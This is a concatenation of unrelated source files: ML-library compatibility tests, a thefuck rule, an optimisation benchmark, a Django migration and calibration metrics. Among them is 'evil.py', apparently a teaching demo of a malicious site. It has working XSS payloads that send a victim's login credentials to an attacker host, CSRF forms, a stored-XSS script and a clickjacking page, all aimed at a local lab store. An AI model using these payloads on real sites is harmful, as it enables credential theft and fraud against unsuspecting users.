class LGIrisRandomForest(LGBaseCase):
    """LightGBM random-forest binary classifier on a binarized iris dataset.

    Test data is exchanged in libsvm (sparse) format, exercising the CSR
    prediction path on the Go side.
    """
    python_template = Template("""
import numpy as np
import pickle
from sklearn import datasets
import lightgbm as lgb
from sklearn.model_selection import train_test_split

data = datasets.load_iris()
X = data['data']
y = data['target']
y[y > 0] = 1
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)

n_estimators = 30
d_train = lgb.Dataset(X_train, label=y_train)
params = {
    'boosting_type': 'rf',
    'objective': 'binary',
    'bagging_fraction': 0.8,
    'feature_fraction': 0.8,
    'bagging_freq': 1,
}
clf = lgb.train(params, d_train, n_estimators)
y_pred = clf.predict(X_test)
model_filename = 'lg_rf_iris.model'
pred_filename = 'lg_rf_iris_true_predictions.txt'
# test_filename = 'iris_test.libsvm'
clf.save_model('$model_filename')
np.savetxt('$true_predictions_filename', y_pred)
datasets.dump_svmlight_file(X_test, y_test, '$data_filename')
""")

    go_template = Template("""
package main

import (
	"github.com/dmitryikh/leaves"
	"github.com/dmitryikh/leaves/mat"
)

func main() {
	test, err := mat.CSRMatFromLibsvmFile("$data_filename", 0, true)
	if err != nil {
		panic(err)
	}
	model, err := leaves.LGEnsembleFromFile("$model_filename", false)
	if err != nil {
		panic(err)
	}
	predictions := mat.DenseMatZero(test.Rows(), model.NOutputGroups())
	err = model.PredictCSR(test.RowHeaders, test.ColIndexes, test.Values, predictions.Values, 0, 1)
	if err != nil {
		panic(err)
	}
	err = predictions.ToCsvFile("$predictions_filename", "\t")
	if err != nil {
		panic(err)
	}
}
""")
class XGIrisMulticlass(XGBaseCase):
    """XGBoost multi:softmax classifier (3 classes) on the iris dataset."""
    python_template = Template("""
import numpy as np
from sklearn import datasets
from sklearn.model_selection import train_test_split
import xgboost as xgb

X, y = datasets.load_iris(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)
xg_train = xgb.DMatrix(X_train, label=y_train)
xg_test = xgb.DMatrix(X_test, label=y_test)
params = {
    'objective': 'multi:softmax',
    'num_class': 3,
}
n_estimators = 20
clf = xgb.train(params, xg_train, n_estimators)
y_pred = clf.predict(xg_test, output_margin=True)
# save the model in binary format
clf.save_model('$model_filename')
np.savetxt('$true_predictions_filename', y_pred, delimiter='\t')
datasets.dump_svmlight_file(X_test, y_test, '$data_filename')
""")

    go_template = Template("""
package main

import (
	"github.com/dmitryikh/leaves"
	"github.com/dmitryikh/leaves/mat"
)

func main() {
	test, err := mat.CSRMatFromLibsvmFile("$data_filename", 0, true)
	if err != nil {
		panic(err)
	}
	model, err := leaves.XGEnsembleFromFile("$model_filename", false)
	if err != nil {
		panic(err)
	}
	predictions := mat.DenseMatZero(test.Rows(), model.NOutputGroups())
	err = model.PredictCSR(test.RowHeaders, test.ColIndexes, test.Values, predictions.Values, 0, 1)
	if err != nil {
		panic(err)
	}
	err = predictions.ToCsvFile("$predictions_filename", "\t")
	if err != nil {
		panic(err)
	}
}
""")

    def compare(self):
        """Compare with a looser tolerance (1e-6) than BaseCase's 1e-10.

        NOTE(review): presumably because XGBoost's binary model format stores
        single-precision values — confirm before tightening.
        """
        self.compare_matrices(
            matrix1_filename=self.files['true_predictions_filename'],
            matrix2_filename=self.files['predictions_filename'],
            tolerance=1e-6,
            max_number_of_mismatches_ratio=0.0
        )
# Registry of compatibility cases executed by the test harness.
cases = [
    LGBreastCancer,
    LGIrisRandomForest,
    XGIrisMulticlass,
]
| 23.6139 | 96 | 0.676422 |
5f9b478da97564c1c1c93c3479c4db395b105610 | 3,373 | py | Python | evil.py | takatama/bottle-store | e77859fb55cf85aa337e422e32614f36758368cf | [
"MIT"
] | null | null | null | evil.py | takatama/bottle-store | e77859fb55cf85aa337e422e32614f36758368cf | [
"MIT"
] | null | null | null | evil.py | takatama/bottle-store | e77859fb55cf85aa337e422e32614f36758368cf | [
"MIT"
] | null | null | null | from threading import ExceptHookArgs
from bottle import route, run, template, request, redirect, hook
import sqlite3
from datetime import datetime
# Host/port this attacker demo site listens on; TARGET_URL is the victim app.
HOST='evil.localtest.me'
PORT=8081
TARGET_URL='http://localhost:8080'
# SQLite file where harvested credentials are stored.
EVIL_DATABASE_FILE = 'evil.db'
@route('/')
def index():
    """Landing page of the attacker-controlled demo site.

    Lists the prepared attacks against TARGET_URL.
    """
    # Force the canonical evil host name so the demos run cross-origin
    # relative to the victim application.
    if request.headers['HOST'] == 'localhost:' + str(PORT):
        redirect('http://' + HOST + ':' + str(PORT))
    return '''
<h1>攻撃者が準備したサイト</h1>
<ul>
<li><a href="/users">盗んだユーザー情報</a></li>
<li><a href="/game1">CSRF</a></li>
<li><a href="/game2">CSRF + Persistent XSS</a></li>
<li><a href="/game3">Clickjacking</a></li>
</ul>'''
@route('/users')
def list_users():
    """Render the credentials harvested via the spoofed login form."""
    conn = sqlite3.connect(EVIL_DATABASE_FILE)
    cur = conn.cursor()
    users = cur.execute('SELECT * FROM users;').fetchall()
    # Columns: user[1]=timestamp, user[2]=email, user[3]=password.
    return template('''
<p>盗んだユーザー情報</p>
<table border="1">
<tr><th>時刻</th><th>メールアドレス</th><th>パスワード</th></tr>
%for user in users:
<tr><td>{{ user[1] }}</td><td>{{ user[2] }}</td><td>{{ user[3] }}</td></tr>
%end
</table>''', users=users)
@route('/users', method="post")
def add_user():
    """Store credentials POSTed by the spoofed login form.

    Redirecting to the target's /logout afterwards hides the theft from the
    victim (they just appear to have been logged out).
    """
    email = request.forms.email
    password = request.forms.password
    conn = sqlite3.connect(EVIL_DATABASE_FILE)
    cur = conn.cursor()
    # Parameterized insert; timestamp records when the credentials arrived.
    cur.execute('INSERT INTO users (datetime, email, password) VALUES (?, ?, ?)', (datetime.now(), email, password))
    conn.commit()
    redirect(TARGET_URL + '/logout')
@route('/game0')
def show_game0():
    """Reflected-XSS demo: the link injects a script that rewrites the
    target's login form action to post credentials to /users here."""
    return '''
<p>楽しいゲームで遊ぶには、<a target="_blank" href="http://localhost:8080/login?message=<script>window.onload=function(){document.querySelector('form').action='http://evil.localtest.me:8081/users'}</script>">ここをクリック</a>してね!</p>'''
@route('/game1')
def show_game1():
    """CSRF demo: a hidden form posts a fake five-star review to the target
    using the victim's session when they click the button."""
    return template('''
<p>とっても楽しいゲームだよ!</p>
<form action="{{ url }}/reviews" method="post">
<input type="hidden" name="product_id" value="1" />
<input type="hidden" name="user_id" value="1" />
<input type="hidden" name="rate" value="5" />
<input type="hidden" name="comment" value="最高の商品です!本当は★100を付けたいくらい!" />
<input type="submit" value="遊んでみる" />
</form>''', url=TARGET_URL)
@route('/game2')
def show_game2():
    """CSRF + persistent-XSS demo: the posted review comment carries a script
    that, when later rendered unescaped, rewrites the displayed price."""
    return template('''
<p>いまだかつてないくらい楽しいゲームだよ!</p>
<form action="{{ url }}/reviews" method="post">
<input type="hidden" name="product_id" value="1" />
<input type="hidden" name="user_id" value="1" />
<input type="hidden" name="rate" value="5" />
<input type="hidden" name="comment" value="本当は★100を付けたいくらい最高の商品なのに、今だけ100円で売ってます!!<script>window.onload=function(){
var td = document.querySelectorAll('tr td')[7];
td.innerHTML = '<s>' + td.innerHTML + '</s><b>今だけ100円!!</b>';
}</script>" />
<input type="submit" value="遊んでみる" />
</form>''', url=TARGET_URL)
@route('/game3')
def show_game3():
    """Clickjacking demo: a real button positioned underneath a transparent
    iframe of the target site; the checkbox toggles the iframe's opacity so
    the overlay trick can be inspected."""
    return template('''
<p>下の方に面白いゲームが遊べるボタンがあるよ!ちゃんと押せるかな??</p>
<p><input type="checkbox" onchange="invisible(this.checked)">消す</p>
<iframe src="{{ url }}/products" width="800" height="1200"></iframe>
<button style="position:absolute; top:370; left:395; z-index:-1;">あそんでみる</button>
<script>function invisible(checked) {
const iframe = document.querySelector('iframe');
if (checked) {
iframe.style = 'opacity:0; filter:alpha(opacity=0);';
} else {
iframe.style = '';
}
}</script>''', url=TARGET_URL)
run(host=HOST, port=PORT, reloader=True) | 34.773196 | 218 | 0.632375 |
0ff01b929974cd7006efffccd07bcfde74b7f1db | 901 | py | Python | thefuck/rules/git_fix_stash.py | MJGrey/thefuck | c88b0792b8a2db3c181938af6c357662993a30c3 | [
"MIT"
] | 1 | 2018-07-06T04:10:56.000Z | 2018-07-06T04:10:56.000Z | thefuck/rules/git_fix_stash.py | MJGrey/thefuck | c88b0792b8a2db3c181938af6c357662993a30c3 | [
"MIT"
] | null | null | null | thefuck/rules/git_fix_stash.py | MJGrey/thefuck | c88b0792b8a2db3c181938af6c357662993a30c3 | [
"MIT"
] | 1 | 2018-07-06T04:11:05.000Z | 2018-07-06T04:11:05.000Z | from thefuck import utils
from thefuck.utils import replace_argument
from thefuck.specific.git import git_support
@git_support
def match(command):
    """Match failed `git stash <subcommand>` calls that printed a usage message."""
    parts = command.script_parts
    if not parts or len(parts) < 2:
        return False
    return parts[1] == 'stash' and 'usage:' in command.stderr
# git's output here is too complicated to be parsed (see the test file)
# Valid `git stash` subcommands used to fuzzy-match the user's typo against.
stash_commands = (
    'apply',
    'branch',
    'clear',
    'drop',
    'list',
    'pop',
    'save',
    'show')
@git_support
def get_new_command(command):
    """Suggest a corrected `git stash` command.

    Fuzzy-matches the mistyped subcommand against the known stash
    subcommands; if nothing is close enough, assume the user meant
    `git stash save` and insert it.
    """
    typo = command.script_parts[2]
    closest = utils.get_closest(typo, stash_commands, fallback_to_first=False)
    if closest is None:
        parts = command.script_parts[:]
        parts.insert(2, 'save')
        return ' '.join(parts)
    return replace_argument(command.script, typo, closest)
| 23.710526 | 81 | 0.658158 |
4d83a9bc5c1e22eebdcd7711f99b520fa37df307 | 1,560 | py | Python | ZDT1.py | jonatanlv/nsga-ii | a664827df037ba69ff7c3ab737d00cfa03bcb76f | [
"MIT"
] | 1 | 2019-07-28T00:15:45.000Z | 2019-07-28T00:15:45.000Z | ZDT1.py | jonatanlv/nsga-ii | a664827df037ba69ff7c3ab737d00cfa03bcb76f | [
"MIT"
] | null | null | null | ZDT1.py | jonatanlv/nsga-ii | a664827df037ba69ff7c3ab737d00cfa03bcb76f | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Función Test ZDT1
"""
import Problem
import numpy as np
from Estadisticas import Estadisticas
def construir_problema(**kwargs):
    """Build the ZDT1 bi-objective benchmark problem.

    ZDT1 is defined on [0, 1]^30 with objectives f1(x) = x1 and
    f2(x) = g(x) * (1 - sqrt(x1 / g(x))), where
    g(x) = 1 + 9 * sum(x2..xn) / (n - 1). Its Pareto-optimal set has
    x2..xn = 0.

    Args:
      **kwargs: Forwarded to Problem.Params; the key 'nom_stats' additionally
        names the statistics collector (default 'estadisticas').

    Returns:
      A configured Problem.Problem instance, including a sampled Pareto front
      under frentePareto['frente'] and its endpoints under
      frentePareto['extremos'].
    """
    def f1(X):
        return X[0]

    def g(X):
        return 1 + 9 * X[1:].sum() / (len(X) - 1)

    def f2(X):
        gX = g(X)
        return gX * (1 - np.sqrt(f1(X) / gX))

    objetivos = [f1, f2]
    dimensiones = 30

    # The search space of this problem is [0, 1]^30.
    limites = np.zeros((dimensiones, 2))
    limites[:, 0] = 0
    limites[:, 1] = 1

    # Sample the analytic Pareto front: x1 varies in [0, 1], all remaining
    # variables are 0.
    soluciones = []
    for valor in np.linspace(0, 1, 500):
        solucion = np.zeros(dimensiones)
        solucion[0] = valor
        soluciones.append(solucion)
    xs = [f1(p) for p in soluciones]
    ys = [f2(p) for p in soluciones]

    # Keep only non-dominated samples: a point survives if its f2 value is
    # strictly below every previous f2. A running minimum makes this O(n)
    # instead of the former O(n^2) prefix scan (min(ys[:i]) per element).
    frente = []
    minimo = float('inf')
    for xx, yy in zip(xs, ys):
        if yy < minimo:
            frente.append((xx, yy))
            minimo = yy
    fp = {}
    fp['frente'] = np.array(frente)
    fp['extremos'] = [fp['frente'][0], fp['frente'][-1]]

    # Algorithm parameters.
    parametros = Problem.Params()
    parametros.update(kwargs)

    # Statistics collector.
    estadisticas = Estadisticas(kwargs.get('nom_stats', 'estadisticas'))

    # Bundle everything into the Problem object.
    problema = Problem.Problem(objetivos, dimensiones, limites, frentePareto=fp,
                               parametros=parametros, stats=estadisticas)
    return problema
70df2bf9799646fd1a3dcf35fe863acd41612795 | 3,270 | py | Python | backend/api/migrations/0004_auto_20210523_1306.py | Technocrats-nitw/Care | 8649e874340339b9ada089702343919fe557c26e | [
"CC0-1.0"
] | 1 | 2021-06-09T09:17:33.000Z | 2021-06-09T09:17:33.000Z | backend/api/migrations/0004_auto_20210523_1306.py | Technocrats-nitw/GoVID | 8649e874340339b9ada089702343919fe557c26e | [
"CC0-1.0"
] | null | null | null | backend/api/migrations/0004_auto_20210523_1306.py | Technocrats-nitw/GoVID | 8649e874340339b9ada089702343919fe557c26e | [
"CC0-1.0"
] | null | null | null | # Generated by Django 3.1.5 on 2021-05-23 07:36
from django.db import migrations, models
class Migration(migrations.Migration):
    """Reshape the `doctors` model: drop demographic fields and add contact,
    location, pricing and profile metadata.

    Auto-generated by Django; applied migrations should not be edited
    retroactively.
    """

    dependencies = [
        ('api', '0003_auto_20210521_0134'),
    ]

    operations = [
        # Remove the old demographic/location columns.
        migrations.RemoveField(
            model_name='doctors',
            name='age',
        ),
        migrations.RemoveField(
            model_name='doctors',
            name='gender',
        ),
        migrations.RemoveField(
            model_name='doctors',
            name='location',
        ),
        migrations.RemoveField(
            model_name='doctors',
            name='specialisation',
        ),
        migrations.RemoveField(
            model_name='doctors',
            name='state',
        ),
        migrations.RemoveField(
            model_name='doctors',
            name='year_dob',
        ),
        # Add the new contact/location/pricing/profile columns.
        migrations.AddField(
            model_name='doctors',
            name='city',
            field=models.CharField(default='City', max_length=20),
        ),
        migrations.AddField(
            model_name='doctors',
            name='contact',
            field=models.IntegerField(default=0),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='doctors',
            name='experience',
            field=models.IntegerField(default=0),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='doctors',
            name='image',
            field=models.CharField(default='-', max_length=600),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='doctors',
            name='latitude',
            field=models.FloatField(default=0),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='doctors',
            name='locality',
            field=models.CharField(default='-', max_length=200),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='doctors',
            name='longitude',
            field=models.FloatField(default=0),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='doctors',
            name='priceRange',
            field=models.IntegerField(default=0),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='doctors',
            name='speciality',
            field=models.CharField(default='-', max_length=60),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='doctors',
            name='type',
            field=models.CharField(default='-', max_length=60),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='doctors',
            name='url',
            field=models.URLField(default='-'),
            preserve_default=False,
        ),
        # Tighten/adjust existing columns.
        migrations.AlterField(
            model_name='doctors',
            name='email',
            field=models.EmailField(max_length=255),
        ),
        migrations.AlterField(
            model_name='doctors',
            name='name',
            field=models.CharField(max_length=60),
        ),
    ]
501f24af1d91586770828741b55ecf2151a349e7 | 475 | py | Python | LeetCode/Aug 2021 LeetCoding Challenge/Subsets II.py | UtkarshPathrabe/Competitive-Coding | ba322fbb1b88682d56a9b80bdd92a853f1caa84e | [
"MIT"
] | 13 | 2021-09-02T07:30:02.000Z | 2022-03-22T19:32:03.000Z | LeetCode/Subsets II.py | UtkarshPathrabe/Competitive-Coding | ba322fbb1b88682d56a9b80bdd92a853f1caa84e | [
"MIT"
] | null | null | null | LeetCode/Subsets II.py | UtkarshPathrabe/Competitive-Coding | ba322fbb1b88682d56a9b80bdd92a853f1caa84e | [
"MIT"
] | 3 | 2021-08-24T16:06:22.000Z | 2021-09-17T15:39:53.000Z | class Solution:
def subsetsWithDup(self, nums: List[int]) -> List[List[int]]:
nums.sort()
result, numsCapacity = set(), len(nums)
def backtrack(currentSubset, startIndex):
result.add(tuple(currentSubset))
for i in range(startIndex, numsCapacity):
currentSubset.append(nums[i])
backtrack(currentSubset, i + 1)
currentSubset.pop()
backtrack([], 0)
return result | 39.583333 | 65 | 0.574737 |
e6757ed7c655051e09e360e2dd0bdc8b417eda2a | 190 | py | Python | simdeblur/scheduler/__init__.py | ljzycmd/SimDeblur | dd2f60c41176b75c4eaf80d740f547c206aa8227 | [
"MIT"
] | 190 | 2021-03-22T13:59:42.000Z | 2022-03-08T21:14:41.000Z | simdeblur/scheduler/__init__.py | ljzycmd/SimDeblur | dd2f60c41176b75c4eaf80d740f547c206aa8227 | [
"MIT"
] | 9 | 2021-04-26T06:44:40.000Z | 2022-03-25T07:48:30.000Z | simdeblur/scheduler/__init__.py | ljzycmd/SimDeblur | dd2f60c41176b75c4eaf80d740f547c206aa8227 | [
"MIT"
] | 27 | 2021-03-23T03:11:00.000Z | 2022-03-19T21:26:02.000Z | from .optim import *
from .lr_scheduler import *
from .build import build_optimizer
from .build import build_lr_scheduler
__all__ = [k for k in globals().keys() if not k.startswith("_")]
| 21.111111 | 64 | 0.747368 |
7a1172868b52be4b3c31cf12a1b46b7e0290740b | 19,366 | py | Python | eval_calibration/calibration_lib.py | thuyduongtt/region_based_active_learning | b3653c31a44135b5680949790549799c83a5a18b | [
"MIT"
] | null | null | null | eval_calibration/calibration_lib.py | thuyduongtt/region_based_active_learning | b3653c31a44135b5680949790549799c83a5a18b | [
"MIT"
] | null | null | null | eval_calibration/calibration_lib.py | thuyduongtt/region_based_active_learning | b3653c31a44135b5680949790549799c83a5a18b | [
"MIT"
] | null | null | null | # coding=utf-8
# Copyright 2020 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python2, python3
"""Library of calibration metrics."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import scipy.special
import six
from six.moves import range
from sklearn.metrics import confusion_matrix as sklearn_cm
def bin_predictions_and_accuracies(probabilities, ground_truth, bins=10):
  """Histogram predicted probabilities into bins and compute per-bin accuracy.

  Args:
    probabilities: A numpy vector of N probabilities assigned to each prediction
    ground_truth: A numpy vector of N ground truth labels in {0,1}
    bins: Number of equal width bins to bin predictions into in [0, 1], or an
      array representing bin edges.

  Returns:
    bin_edges: Numpy vector of floats containing the edges of the bins
      (including leftmost and rightmost).
    accuracies: Numpy vector of floats for the average accuracy of the
      predictions in each bin.
    counts: Numpy vector of ints containing the number of examples per bin.
  """
  _validate_probabilities(probabilities)
  _check_rank_nonempty(rank=1,
                       probabilities=probabilities,
                       ground_truth=ground_truth)

  if len(probabilities) != len(ground_truth):
    raise ValueError(
        'Probabilies and ground truth must have the same number of elements.')

  if any(v not in [0., 1., True, False] for v in ground_truth):
    raise ValueError(
        'Ground truth must contain binary labels {0,1} or {False, True}.')

  num_bins = bins if isinstance(bins, int) else bins.size - 1

  # np.digitize bins are open on one side, so nudge exact zeros upward to
  # keep them inside the first bin.
  probabilities = np.where(probabilities == 0, 1e-8, probabilities)
  counts, bin_edges = np.histogram(probabilities, bins=bins, range=[0., 1.])
  indices = np.digitize(probabilities, bin_edges, right=True)
  accuracies = np.array(
      [np.mean(ground_truth[indices == b]) for b in range(1, num_bins + 1)])
  return bin_edges, accuracies, counts
def bin_centers_of_mass(probabilities, bin_edges):
  """Return the mean predicted probability within each bin."""
  # Exact zeros would fall outside the (half-open) first bin of np.digitize.
  shifted = np.where(probabilities == 0, 1e-8, probabilities)
  bin_ids = np.digitize(shifted, bin_edges, right=True)
  return np.array([np.mean(shifted[bin_ids == b])
                   for b in range(1, len(bin_edges))])
def expected_calibration_error(probabilities, ground_truth, bins=15):
  """Compute the expected calibration error of predictions in [0, 1].

  Args:
    probabilities: A numpy vector of N probabilities assigned to each prediction
    ground_truth: A numpy vector of N ground truth labels in {0,1, True, False}
    bins: Number of equal width bins to bin predictions into in [0, 1], or
      an array representing bin edges.

  Returns:
    Float: the expected calibration error.
  """
  bin_edges, accuracies, counts = bin_predictions_and_accuracies(
      probabilities, ground_truth, bins)
  bin_centers = bin_centers_of_mass(probabilities, bin_edges)
  total = float(np.sum(counts))
  # Weighted |confidence - accuracy| gap over the non-empty bins.
  gaps = [(counts[b] / total) * np.abs(bin_centers[b] - accuracies[b])
          for b in range(bin_centers.size) if counts[b] > 0]
  return np.sum(gaps)
def accuracy_top_k(probabilities, labels, top_k):
  """Compute the top-k accuracy of predictions.

  A prediction counts as correct if the ground-truth class is among the k
  classes with the highest predicted probabilities.

  Args:
    probabilities: Array of probabilities of shape [num_samples, num_classes].
    labels: Integer array labels of shape [num_samples].
    top_k: Integer. Number of highest-probability classes to consider.

  Returns:
    float: Top-k accuracy of predictions.
  """
  _, hits = _filter_top_k(probabilities, labels, top_k)
  return hits.any(axis=-1).mean()
def _filter_top_k(probabilities, labels, top_k):
"""Extract top k predicted probabilities and corresponding ground truths."""
labels_one_hot = np.zeros(probabilities.shape)
labels_one_hot[np.arange(probabilities.shape[0]), labels] = 1
if top_k is None:
return probabilities, labels_one_hot
# Negate probabilities for easier use with argpartition (which sorts from
# lowest)
negative_prob = -1. * probabilities
ind = np.argpartition(negative_prob, top_k - 1, axis=-1)
top_k_ind = ind[:, :top_k]
rows = np.expand_dims(np.arange(probabilities.shape[0]), axis=1)
lowest_k_negative_probs = negative_prob[rows, top_k_ind]
output_probs = -1. * lowest_k_negative_probs
labels_one_hot_k = labels_one_hot[rows, top_k_ind]
return output_probs, labels_one_hot_k
def get_multiclass_predictions_and_correctness(probabilities, labels, top_k=1):
  """Return top-k predicted probabilities and per-prediction correctness."""
  _validate_probabilities(probabilities, multiclass=True)
  _check_rank_nonempty(rank=1, labels=labels)
  _check_rank_nonempty(rank=2, probabilities=probabilities)

  if top_k != 1:
    return _filter_top_k(probabilities, labels, top_k)

  # Fast path: compare the argmax prediction against the label directly.
  predicted = np.argmax(probabilities, -1)
  top_probs = probabilities[np.arange(len(labels)), predicted]
  return top_probs, np.equal(predicted, labels)
def expected_calibration_error_multiclass(probabilities, labels, bins=15,
                                          top_k=1):
  """Compute expected calibration error from Guo et al. 2017.

  For details, see https://arxiv.org/abs/1706.04599.
  Note: If top_k is 1, this only measures calibration of the argmax
  prediction.

  Args:
    probabilities: Array of probabilities of shape [num_samples, num_classes].
    labels: Integer array labels of shape [num_samples].
    bins: Number of equal width bins to bin predictions into in [0, 1], or
      an array representing bin edges.
    top_k: Integer or None. If integer, use the top k predicted
      probabilities in ECE calculation (can be informative for problems with
      many classes and lower top-1 accuracy). If None, use all classes.

  Returns:
    float: Expected calibration error.
  """
  top_probs, is_correct = get_multiclass_predictions_and_correctness(
      probabilities, labels, top_k)
  return expected_calibration_error(
      top_probs.flatten(), is_correct.flatten(), bins)
# TODO(yovadia): Write unit-tests.
def compute_accuracies_at_confidences(labels, probs, thresholds):
  """Compute accuracy of samples above each confidence threshold.

  Args:
    labels: Array of integer categorical labels.
    probs: Array of categorical probabilities.
    thresholds: Array of floating point probability thresholds in [0, 1).

  Returns:
    accuracies: Array of accuracies over examples with confidence > T for each T
        in thresholds.
    counts: Count of examples with confidence > T for each T in thresholds.
  """
  assert probs.shape[:-1] == labels.shape

  pred_class = probs.argmax(-1)
  pred_conf = probs.max(-1)
  correct = np.equal(pred_class, labels)

  out_shape = (len(thresholds),) + probs.shape[:-2]
  accuracies = np.zeros(out_shape)
  counts = np.zeros(out_shape)
  for idx, thresh in enumerate(thresholds):
    keep = pred_conf >= thresh
    counts[idx] = keep.sum(-1)
    # Masked mean: average correctness over only the kept examples.
    accuracies[idx] = np.ma.masked_array(correct, mask=~keep).mean(-1)
  return accuracies, counts
def brier_scores(labels, probs=None, logits=None):
  """Compute elementwise Brier score.

  Args:
    labels: Tensor of integer labels shape [N1, N2, ...]
    probs: Tensor of categorical probabilities of shape [N1, N2, ..., M].
    logits: If `probs` is None, class probabilities are computed as a softmax
      over these logits, otherwise, this argument is ignored.

  Returns:
    Tensor of shape [N1, N2, ...] consisting of Brier score contribution from
    each element. The full-dataset Brier score is an average of these values.
  """
  assert (probs is None) != (logits is None)
  if probs is None:
    probs = scipy.special.softmax(logits, axis=-1)
  num_classes = probs.shape[-1]

  flat_probs = probs.reshape([-1, num_classes])
  flat_labels = labels.reshape([len(flat_probs)])

  # Probability assigned to each example's true label.
  label_prob = np.take_along_axis(
      flat_probs, flat_labels[:, None], axis=-1)[:, 0]
  scores = np.square(flat_probs).sum(axis=-1) - 2 * label_prob
  return scores.reshape(labels.shape)
# def brier_decompositions(labels, probs):
# """Compute Brier decompositions for batches of datasets.
# Args:
# labels: Tensor of integer labels shape [S1, S2, ..., N]
# probs: Tensor of categorical probabilities of shape [S1, S2, ..., N, M].
# Returns:
# Tensor of shape [S1, S2, ..., 3] consisting of 3-component Brier
# decompositions for each series of probabilities and labels. The components
# are ordered as <uncertainty, resolution, reliability>.
# """
# labels = tf.cast(labels, tf.int32)
# probs = tf.cast(probs, tf.float32)
# batch_shape = labels.shape[:-1]
# flatten, unflatten = _make_flatten_unflatten_fns(batch_shape)
# labels = flatten(labels)
# probs = flatten(probs)
# out = []
# for labels_i, probs_i in zip(labels, probs):
# out_i = brier_decomposition(labels_i, probabilities=probs_i)
# out.append(tf.stack(out_i, axis=-1))
# out = tf.stack(out)
# return unflatten(out)
# def brier_decomposition(labels=None, logits=None, probabilities=None):
# r"""Decompose the Brier score into uncertainty, resolution, and reliability.
# [Proper scoring rules][1] measure the quality of probabilistic predictions;
# any proper scoring rule admits a [unique decomposition][2] as
# `Score = Uncertainty - Resolution + Reliability`, where:
# * `Uncertainty`, is a generalized entropy of the average predictive
# distribution; it can both be positive or negative.
# * `Resolution`, is a generalized variance of individual predictive
# distributions; it is always non-negative. Difference in predictions reveal
# information, that is why a larger resolution improves the predictive score.
# * `Reliability`, a measure of calibration of predictions against the true
# frequency of events. It is always non-negative and a lower value here
# indicates better calibration.
# This method estimates the above decomposition for the case of the Brier
# scoring rule for discrete outcomes. For this, we need to discretize the space
# of probability distributions; we choose a simple partition of the space into
# `nlabels` events: given a distribution `p` over `nlabels` outcomes, the index
# `k` for which `p_k > p_i` for all `i != k` determines the discretization
# outcome; that is, `p in M_k`, where `M_k` is the set of all distributions for
# which `p_k` is the largest value among all probabilities.
# The estimation error of each component is O(k/n), where n is the number
# of instances and k is the number of labels. There may be an error of this
# order when compared to `brier_score`.
# #### References
# [1]: Tilmann Gneiting, Adrian E. Raftery.
# Strictly Proper Scoring Rules, Prediction, and Estimation.
# Journal of the American Statistical Association, Vol. 102, 2007.
# https://www.stat.washington.edu/raftery/Research/PDF/Gneiting2007jasa.pdf
# [2]: Jochen Broecker. Reliability, sufficiency, and the decomposition of
# proper scores.
# Quarterly Journal of the Royal Meteorological Society, Vol. 135, 2009.
# https://rmets.onlinelibrary.wiley.com/doi/epdf/10.1002/qj.456
# Args:
# labels: Tensor, (n,), with tf.int32 or tf.int64 elements containing ground
# truth class labels in the range [0,nlabels].
# logits: Tensor, (n, nlabels), with logits for n instances and nlabels.
# probabilities: Tensor, (n, nlabels), with predictive probability
# distribution (alternative to logits argument).
# Returns:
# uncertainty: Tensor, scalar, the uncertainty component of the
# decomposition.
# resolution: Tensor, scalar, the resolution component of the decomposition.
# reliability: Tensor, scalar, the reliability component of the
# decomposition.
# """
# if (logits is None) == (probabilities is None):
# raise ValueError(
# 'brier_decomposition expects exactly one of logits or probabilities.')
# if probabilities is None:
# probabilities = scipy.special.softmax(logits, axis=1)
# _, nlabels = probabilities.shape # Implicit rank check.
# # Compute pbar, the average distribution
# pred_class = tf.argmax(probabilities, axis=1, output_type=tf.int32)
# confusion_matrix = tf.math.confusion_matrix(pred_class, labels, nlabels,
# dtype=tf.float32)
# dist_weights = tf.reduce_sum(confusion_matrix, axis=1)
# dist_weights /= tf.reduce_sum(dist_weights)
# pbar = tf.reduce_sum(confusion_matrix, axis=0)
# pbar /= tf.reduce_sum(pbar)
# # dist_mean[k,:] contains the empirical distribution for the set M_k
# # Some outcomes may not realize, corresponding to dist_weights[k] = 0
# dist_mean = confusion_matrix / tf.expand_dims(
# tf.reduce_sum(confusion_matrix, axis=1) + 1.0e-7, 1)
# # Uncertainty: quadratic entropy of the average label distribution
# uncertainty = -tf.reduce_sum(tf.square(pbar))
# # Resolution: expected quadratic divergence of predictive to mean
# resolution = tf.square(tf.expand_dims(pbar, 1) - dist_mean)
# resolution = tf.reduce_sum(dist_weights * tf.reduce_sum(resolution, axis=1))
# # Reliability: expected quadratic divergence of predictive to true
# prob_true = tf.gather(dist_mean, pred_class, axis=0)
# reliability = tf.reduce_sum(tf.square(prob_true - probabilities), axis=1)
# reliability = tf.reduce_mean(reliability)
# return uncertainty, resolution, reliability
def brier_decomp_npy(labels=None, logits=None, probabilities=None):
    """Decompose the Brier score into uncertainty, resolution and reliability.

    NumPy port of a TF `brier_decomposition`; see Broecker, QJRMS 2009
    (Score = Uncertainty - Resolution + Reliability). Exactly one of
    `logits` / `probabilities` must be given.

    Args:
      labels: Integer ground-truth labels, shape (n,).
      logits: Optional logits, shape (n, nlabels).
      probabilities: Optional predictive distributions, shape (n, nlabels).

    Returns:
      Tuple (uncertainty, resolution, reliability) of scalars.
    """
    if (logits is None) == (probabilities is None):
        raise ValueError("brier decomposition expects either logits or probabilities")
    if probabilities is None:
        probabilities = scipy.special.softmax(logits, axis=1)
    _, nlabels = probabilities.shape  # [num_samples, num_class]
